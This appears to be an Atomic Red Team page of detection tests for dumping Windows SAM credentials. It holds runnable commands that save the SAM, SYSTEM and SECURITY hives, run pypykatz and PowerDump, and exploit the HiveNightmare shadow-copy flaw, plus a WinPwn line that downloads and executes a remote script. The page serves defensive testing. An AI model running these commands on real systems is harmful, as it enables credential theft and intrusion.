Try it using Invoke-Atomic

OS Credential Dumping: Security Account Manager

Description from ATT&CK

Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.

A number of tools can be used to retrieve the SAM file through in-memory techniques:

Alternatively, the SAM can be extracted from the Registry with Reg:

  • reg save HKLM\sam sam
  • reg save HKLM\system system

Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)

Notes:

  • RID 500 account is the local, built-in administrator.
  • RID 501 is the guest account.
  • User accounts start with a RID of 1,000+.

Atomic Tests

Atomic Test #1 - Registry dump of SAM, creds, and secrets

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7

Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.

Supported Platforms: windows

auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44

Inputs:

None

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
3
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security

Cleanup Commands:

1
2
3
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul

Atomic Test #2 - Registry parse with pypykatz

Parses registry hives to obtain stored credentials.

Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.

Supported Platforms: windows

auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263

Inputs:

Name Description Type Default Value
venv_path Path to the folder for the tactics venv string PathToAtomicsFolder..\ExternalPayloads\venv_t1003_002

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
"#{venv_path}\Scripts\pypykatz" live lsa

Dependencies: Run with powershell!

Description: Computer must have python 3 installed

Check Prereq Commands:

1
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }

Get Prereq Commands:

1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait

Description: Computer must have venv configured at #{venv_path}

Check Prereq Commands:

1
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }

Get Prereq Commands:

1
py -m venv "#{venv_path}"

Description: pypykatz must be installed

Check Prereq Commands:

1
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }

Get Prereq Commands:

1
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null

Atomic Test #3 - esentutl.exe SAM copy

Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.

Supported Platforms: windows

auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480

Inputs:

Name Description Type Default Value
file_path Path to the file to copy path %SystemRoot%/system32/config/SAM
file_name Name of the copied file string SAM
copy_dest Destination of the copied file string %temp%

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}

Cleanup Commands:

1
del #{copy_dest}\#{file_name} >nul 2>&1

Atomic Test #4 - PowerDump Hashes and Usernames from Registry

Executes a hashdump by reading the hashes from the registry.

Supported Platforms: windows

auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump

Dependencies: Run with powershell!

Description: PowerDump script must exist on disk at specified location Check Prereq Commands:

1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}

Get Prereq Commands:

1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"

Atomic Test #5 - dump volume shadow copy hives with certutil

Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM". This can be done with a non-admin user account. CVE-2021-36934

Supported Platforms: windows

auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7

Inputs:

Name Description Type Default Value
target_hive Hive you wish to dump string SAM
limit Limit to the number of shadow copies to iterate through when trying to copy the hive integer 10

Attack Commands: Run with command_prompt!

1
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*

Cleanup Commands:

1
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)

Atomic Test #6 - dump volume shadow copy hives with System.IO.File

Dump hives from volume shadow copies with System.IO.File. CVE-2021-36934

Supported Platforms: windows

auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0

Inputs:

Name Description Type Default Value
target_hive Hive you wish to dump string SAM
limit Limit to the number of shadow copies to iterate through when trying to copy the hive integer 10

Attack Commands: Run with powershell!

1
2
3
4
1..#{limit} | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
 ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}

Cleanup Commands:

1
2
3
1..#{limit} | % {
  rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}

Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes

Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn

Supported Platforms: windows

auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive

Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.

Supported Platforms: windows

auto_generated_guid: 21df41be-cdd8-4695-a650-c3981113aa3c

Inputs:

None

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
3
reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security

Cleanup Commands:

1
2
3
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul

source